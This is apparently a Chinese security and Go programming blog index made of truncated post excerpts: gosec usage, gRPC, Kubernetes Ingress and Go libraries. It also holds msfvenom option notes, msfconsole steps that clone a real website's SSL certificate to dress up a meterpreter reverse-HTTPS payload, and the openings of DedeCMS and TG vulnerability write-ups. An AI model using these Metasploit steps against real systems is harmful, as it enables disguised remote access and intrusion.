代码审计工具 gosec 1https://github.com/securego/gosec 简单的使用方法 直接输出内容到终端 1gosec -fmt=json ./...` 支持的格式有：`text, json, yaml, csv, sonarqube, JUnit XML, html 输出到指定文件 1`gosec -fmt=json -out=results.json ./

msfvenom部分参数解读1234567891011121314151617181920212223242526272829303132333435363738-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型

制作证书进入 msfconsole 123use auxiliary/gather/impersonate_sslset rhosts www.4399.comrun 记录证书的位置cert_4399.pem 生成payload123456use payload/windows/x64/meterpreter_reverse_httpsset stagerverifysslcert 1set

参考 Ingress | Kubernetes Kubernetes K8S之Ingress详解与示例-腾讯云开发者社区-腾讯云 (tencent.com)

参考文章 Quick start | Go | gRPC Quick start | Go | gRPC 环境搭建安装protoc 转换工具，该工具无论是server 或者是clinet 都是可以准备一个 https://github.com/protocolbuffers/protobuf/releases 然后创建一个新的项目 拉一下 123go get github.com/golan

0x01 产品简介织梦内容管理系统(DedeCMS)，是一个集内容发布、编辑、管理检索等于一体的网站管理系统(Web CMS)，他拥有国外CMS众多特点之外，还结合中国用户的需要，对内容管理系统概念进行明确分析和定位。 0x02 漏洞描述DedeCMS V5.7.114存在远程代码执行漏洞。产生该漏洞的原因是，虽然sys_verizes.php对编辑的文件进行了一定的限制，但攻击者仍然可以绕过这些

简介反射reflect 变量的内在机制变量包包含了类型信息，和值信息 类型信息是静态的元信息是预先定义好的 值信息，是程序运行过程中动态改变的 反射的使用reflect 包封装了反射相关的方法 reflect.TypeOf 是静态的 reflect.ValueOf 是动态的 空接口与反射

简介rpc 远程过程调用（Remote Procedure Call，RPC）是一个计算机通信协议 该协议允许运行于一台计算机的程序调用另一台计算机的子程序，而程序员无需额外地为这个交互作用编程 如果涉及的软件采用面向对象编程，那么远程过程调用亦可称作远程调用或远程方法调用 golang 中实现rpc golang中实现RPC非常简单，官方提供了封装好的库，还有一些第三方的库 golang官方的

简介log包是Go语言标准库的一部分，提供了基本的日志记录功能。它支持日志消息的格式化、日志输出位置的设置以及日志级别的管理。通过log包，我们可以方便地记录程序运行中的各种信息，如调试信息、错误消息和普通运行日志。 使用基础方法主要就是几个方法 123456789log.Print()log.Printf()log.Println()log.Fatal()log.Fatalf()log.Fata

0x01 产品简介TG万网博通秉承技术驱动场景的创新理念，2015年，国内第一家推出基于人工智能和深度学习技术的“全息AI弱电网络综合运维平台”，实现了弱电智能化AI网络零突破。2017年，国内第一家推出针对视频网络系统专用的“全息AI安防网络专用平台”，并成为了安防行业网络传输标杆产品。依托创新的技术实力，全息AI平台及解决方案已成功的应用于北京冬奥会、北京世园会、北京大兴国际机场、清华大学、南